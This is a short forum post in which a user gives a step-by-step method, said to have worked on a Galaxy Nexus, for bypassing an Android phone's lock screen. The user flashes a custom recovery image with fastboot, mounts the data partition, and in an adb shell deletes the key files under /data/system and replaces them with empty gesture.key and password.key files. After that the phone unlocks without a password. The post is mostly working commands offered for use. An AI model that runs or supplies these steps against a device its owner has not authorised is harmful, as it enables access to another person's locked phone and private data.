Jump to content

[ANDROID] - Howto Bypassing Android's Password Screen


sierrabrav0

Recommended Posts

https://www.youtube.com/watch?v=X7McMB_Gbj8

I'v tried it on my Galaxy Nexus and it worked

1# Boot the phone in booloader mode

2# Flash the recovery partition with fastboot and the ClockWorkMod Recovery image

fastboot flash recovery recovery.img

3# Boot in recovery mode

4# Mount the /system and /data partitions

5# In the terminal start ADB Shell

> adb shell

> cd /data/system

> rm *.key

> touch gesture.key

> touch password.key

6# Reboot the phone and you can now unlock the phone without any password or with any pattern.

> reboot

Edited by sierrabrav0
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...